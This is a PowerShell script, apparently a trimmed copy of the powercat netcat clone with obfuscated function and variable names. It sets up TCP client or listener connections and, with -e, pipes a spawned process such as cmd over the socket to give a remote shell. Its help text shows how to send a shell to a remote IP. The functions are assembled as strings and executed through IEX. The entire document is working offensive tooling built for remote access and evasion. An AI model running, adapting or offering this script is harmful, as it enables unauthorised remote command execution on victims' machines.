function x7k9
{
  param(
    [alias("Client")][string]$m3w="",
    [alias("Listen")][switch]$q8r=$False,
    [alias("Port")][Parameter(Position=-1)][string]$n5t="",
    [alias("Execute")][string]$z2p=""
  )
  
  ############### HELP ###############
  $Help = "
powercat - Netcat, The Powershell Version (Simplified)

Usage: powercat [-c or -l] [-p port] [-e process]

  -c  <ip>        Client Mode. Provide the IP of the system you wish to connect to.
            
  -l              Listen Mode. Start a listener on the port specified by -p.
  
  -p  <port>      Port. The port to connect to, or the port to listen on.
  
  -e  <proc>      Execute. Specify the name of the process to start.

Examples:

  Listen on port 8000 and print the output to the console.
      powercat -l -p 8000
  
  Connect to 10.1.1.1 port 443 and send a shell.
      powercat -c 10.1.1.1 -p 443 -e cmd
"
  
  ############### VALIDATE ARGS ###############
  if((($m3w -eq "") -and (!$q8r)) -or (($m3w -ne "") -and $q8r)){return "You must select either client mode (-c) or listen mode (-l)."}
  if($n5t -eq ""){return "Please provide a port number to -p."}
  
  if($q8r)
  {
    $a4b = $False
    netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $n5t){Write-Output ("The selected port " + $n5t + " is already in use.") ; $a4b=$True}}
    if($a4b){break}
  }
  ############### VALIDATE ARGS ###############
  
  ########## TCP FUNCTIONS ##########
  function h6d_TCP
  {
    param($v9s)
    $m3w,$q8r,$n5t,$t = $v9s
    $k1f = @{}
    if(!$q8r)
    {
      $k1f["l"] = $False
      $j7x = New-Object System.Net.Sockets.TcpClient
      Write-Host "Connecting..."
      $w2e = $j7x.BeginConnect($m3w,$n5t,$null,$null)
    }
    else
    {
      $k1f["l"] = $True
      Write-Host ("Listening on [0.0.0.0] (port " + $n5t + ")")
      $j7x = New-Object System.Net.Sockets.TcpListener $n5t
      $j7x.Start()
      $w2e = $j7x.BeginAcceptTcpClient($null, $null)
    }
    
    $r8m = [System.Diagnostics.Stopwatch]::StartNew()
    while($True)
    {
      if($Host.UI.RawUI.KeyAvailable)
      {
        if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode))
        {
          Write-Host "CTRL or ESC caught. Stopping TCP Setup..."
          if($k1f["l"]){$j7x.Stop()}
          else{$j7x.Close()}
          $r8m.Stop()
          break
        }
      }
      if($r8m.Elapsed.TotalSeconds -gt 60)
      {
        if(!$q8r){$j7x.Close()}
        else{$j7x.Stop()}
        $r8m.Stop()
        Write-Host "Timeout!" ; break
        break
      }
      if($w2e.IsCompleted)
      {
        if(!$q8r)
        {
          try
          {
            $j7x.EndConnect($w2e)
            $u5y = $j7x.GetStream()
            $p3l = $j7x.ReceiveBufferSize
            Write-Host ("Connection to " + $m3w + ":" + $n5t + " [tcp] succeeded!")
          }
          catch{$j7x.Close(); $r8m.Stop(); break}
        }
        else
        {
          $c9n = $j7x.EndAcceptTcpClient($w2e)
          $u5y = $c9n.GetStream()
          $p3l = $c9n.ReceiveBufferSize
          Write-Host ("Connection from [" + $c9n.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $n5t + " [tcp] accepted (source port " + $c9n.Client.RemoteEndPoint.Port + ")")
        }
        break
      }
    }
    $r8m.Stop()
    if($j7x -eq $null){break}
    $k1f["Stream"] = $u5y
    $k1f["Socket"] = $j7x
    $k1f["BufferSize"] = $p3l
    $k1f["StreamDestinationBuffer"] = (New-Object System.Byte[] $k1f["BufferSize"])
    $k1f["StreamReadOperation"] = $k1f["Stream"].BeginRead($k1f["StreamDestinationBuffer"], 0, $k1f["BufferSize"], $null, $null)
    $k1f["Encoding"] = New-Object System.Text.AsciiEncoding
    $k1f["StreamBytesRead"] = 1
    return $k1f
  }
  function g4t_TCP
  {
    param($k1f)
    $d8a = $null
    if($k1f["StreamBytesRead"] -eq 0){break}
    if($k1f["StreamReadOperation"].IsCompleted)
    {
      $s6h = $k1f["Stream"].EndRead($k1f["StreamReadOperation"])
      if($s6h -eq 0){break}
      $d8a = $k1f["StreamDestinationBuffer"][0..([int]$s6h-1)]
      $k1f["StreamReadOperation"] = $k1f["Stream"].BeginRead($k1f["StreamDestinationBuffer"], 0, $k1f["BufferSize"], $null, $null)
    }
    return $d8a,$k1f
  }
  function f2v_TCP
  {
    param($d8a,$k1f)
    $k1f["Stream"].Write($d8a, 0, $d8a.Length)
    return $k1f
  }
  function e9q_TCP
  {
    param($k1f)
    try{$k1f["Stream"].Close()}
    catch{}
    if($k1f["l"]){$k1f["Socket"].Stop()}
    else{$k1f["Socket"].Close()}
  }
  ########## TCP FUNCTIONS ##########
  
  ########## CMD FUNCTIONS ##########
  function h6d_CMD
  {
    param($v9s)
    $k1f = @{}
    $i7o = New-Object System.Diagnostics.ProcessStartInfo
    $i7o.FileName = $v9s[0]
    $i7o.UseShellExecute = $False
    $i7o.RedirectStandardInput = $True
    $i7o.RedirectStandardOutput = $True
    $i7o.RedirectStandardError = $True
    $k1f["Process"] = [System.Diagnostics.Process]::Start($i7o)
    Write-Host ("Starting Process " + $v9s[0] + "...")
    $k1f["Process"].Start() | Out-Null
    $k1f["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
    $k1f["StdOutReadOperation"] = $k1f["Process"].StandardOutput.BaseStream.BeginRead($k1f["StdOutDestinationBuffer"], 0, 65536, $null, $null)
    $k1f["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
    $k1f["StdErrReadOperation"] = $k1f["Process"].StandardError.BaseStream.BeginRead($k1f["StdErrDestinationBuffer"], 0, 65536, $null, $null)
    $k1f["Encoding"] = New-Object System.Text.AsciiEncoding
    return $k1f
  }
  function g4t_CMD
  {
    param($k1f)
    [byte[]]$d8a = @()
    if($k1f["StdOutReadOperation"].IsCompleted)
    {
      $b5c = $k1f["Process"].StandardOutput.BaseStream.EndRead($k1f["StdOutReadOperation"])
      if($b5c -eq 0){break}
      $d8a += $k1f["StdOutDestinationBuffer"][0..([int]$b5c-1)]
      $k1f["StdOutReadOperation"] = $k1f["Process"].StandardOutput.BaseStream.BeginRead($k1f["StdOutDestinationBuffer"], 0, 65536, $null, $null)
    }
    if($k1f["StdErrReadOperation"].IsCompleted)
    {
      $l3k = $k1f["Process"].StandardError.BaseStream.EndRead($k1f["StdErrReadOperation"])
      if($l3k -eq 0){break}
      $d8a += $k1f["StdErrDestinationBuffer"][0..([int]$l3k-1)]
      $k1f["StdErrReadOperation"] = $k1f["Process"].StandardError.BaseStream.BeginRead($k1f["StdErrDestinationBuffer"], 0, 65536, $null, $null)
    }
    return $d8a,$k1f
  }
  function f2v_CMD
  {
    param($d8a,$k1f)
    $k1f["Process"].StandardInput.WriteLine($k1f["Encoding"].GetString($d8a).TrimEnd("`r").TrimEnd("`n"))
    return $k1f
  }
  function e9q_CMD
  {
    param($k1f)
    $k1f["Process"] | Stop-Process
  }  
  ########## CMD FUNCTIONS ##########

  ########## CONSOLE FUNCTIONS ##########
  function h6d_Console
  {
    param($v9s)
    $k1f = @{}
    $k1f["Encoding"] = New-Object System.Text.AsciiEncoding
    return $k1f
  }
  function g4t_Console
  {
    param($k1f)
    $d8a = $null
    if($Host.UI.RawUI.KeyAvailable)
    {
      $d8a = $k1f["Encoding"].GetBytes((Read-Host) + "`n")
    }
    return $d8a,$k1f
  }
  function f2v_Console
  {
    param($d8a,$k1f)
    Write-Host -n $k1f["Encoding"].GetString($d8a)
    return $k1f
  }
  function e9q_Console
  {
    param($k1f)
    return
  }
  ########## CONSOLE FUNCTIONS ##########
  
  ########## MAIN FUNCTION ##########
  function y1m
  {
    param($x4z,$w8j)
    try
    {
      Write-Host "Setting up Stream 1..."
      try{$t6n = Stream1_Setup $x4z}
      catch{Write-Host "Stream 1 Setup Failure" ; return}
      
      Write-Host "Setting up Stream 2..."
      try{$r2s = Stream2_Setup $w8j}
      catch{Write-Host "Stream 2 Setup Failure" ; return}
      
      $d8a = $null
      
      Write-Host "Both Communication Streams Established. Redirecting Data Between Streams..."
      while($True)
      {
        try
        {
          $d8a,$r2s = Stream2_ReadData $r2s
          if(($d8a.Length -eq 0) -or ($d8a -eq $null)){Start-Sleep -Milliseconds 100}
          if($d8a -ne $null){$t6n = Stream1_WriteData $d8a $t6n}
          $d8a = $null
        }
        catch
        {
          Write-Host "Failed to redirect data from Stream 2 to Stream 1" ; return
        }
        
        try
        {
          $d8a,$t6n = Stream1_ReadData $t6n
          if(($d8a.Length -eq 0) -or ($d8a -eq $null)){Start-Sleep -Milliseconds 100}
          if($d8a -ne $null){$r2s = Stream2_WriteData $d8a $r2s}
          $d8a = $null
        }
        catch
        {
          Write-Host "Failed to redirect data from Stream 1 to Stream 2" ; return
        }
      }
    }
    finally
    {
      try
      {
        Stream2_Close $r2s
      }
      catch
      {
        Write-Host "Failed to close Stream 2"
      }
      try
      {
        Stream1_Close $t6n
      }
      catch
      {
        Write-Host "Failed to close Stream 1"
      }
    }
  }
  ########## MAIN FUNCTION ##########
  
  ########## EXECUTION ##########
  # Set up TCP as Stream 1
  $o5u = ("function Stream1_Setup`n{`n" + ${function:h6d_TCP} + "`n}`n`n")
  $o5u += ("function Stream1_ReadData`n{`n" + ${function:g4t_TCP} + "`n}`n`n")
  $o5u += ("function Stream1_WriteData`n{`n" + ${function:f2v_TCP} + "`n}`n`n")
  $o5u += ("function Stream1_Close`n{`n" + ${function:e9q_TCP} + "`n}`n`n")
  
  if($q8r){$a3g = "y1m @('',`$True,$n5t,60) "}
  else{$a3g = "y1m @('$m3w',`$False,$n5t,60) "}
  
  # Set up Stream 2 based on -e parameter
  if($z2p -ne "")
  {
    $o5u += ("function Stream2_Setup`n{`n" + ${function:h6d_CMD} + "`n}`n`n")
    $o5u += ("function Stream2_ReadData`n{`n" + ${function:g4t_CMD} + "`n}`n`n")
    $o5u += ("function Stream2_WriteData`n{`n" + ${function:f2v_CMD} + "`n}`n`n")
    $o5u += ("function Stream2_Close`n{`n" + ${function:e9q_CMD} + "`n}`n`n")
    $a3g += "@('$z2p')`n`n"
  }
  else
  {
    $o5u += ("function Stream2_Setup`n{`n" + ${function:h6d_Console} + "`n}`n`n")
    $o5u += ("function Stream2_ReadData`n{`n" + ${function:g4t_Console} + "`n}`n`n")
    $o5u += ("function Stream2_WriteData`n{`n" + ${function:f2v_Console} + "`n}`n`n")
    $o5u += ("function Stream2_Close`n{`n" + ${function:e9q_Console} + "`n}`n`n")
    $a3g += "@()"
  }
  
  $o5u += ("function y1m`n{`n" + ${function:y1m} + "`n}`n`n")
  $a3g = ($o5u + $a3g)
  
  # Execute the payload
  IEX $a3g
  ########## EXECUTION ##########
} 